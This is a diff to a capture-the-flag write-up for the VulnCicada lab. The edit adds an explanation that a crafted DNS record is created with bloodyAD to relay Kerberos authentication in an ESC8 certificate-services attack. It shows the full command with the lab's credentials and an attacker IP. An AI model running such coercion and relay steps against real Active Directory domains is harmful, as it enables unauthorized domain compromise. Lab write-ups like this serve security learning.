dh4r4/0xdh4r4/write-ups/VulnCicada.md

 #### ESC8

-To be able to perform the coercion for the domain controller to send a SMB request to our attacker device, we first need to create a DNS Record using bloodyAD
+To be able to perform the coercion for the domain controller to send a SMB request to our attacker device, we first need to create a DNS Record using bloodyAD.
+This is done to be able to relay kerberos authentication((more details)[https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx])
 ```
 $ bloodyAD -u Rosie.Powell -d cicada.vl -p Cicada123 -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.15.170
 ```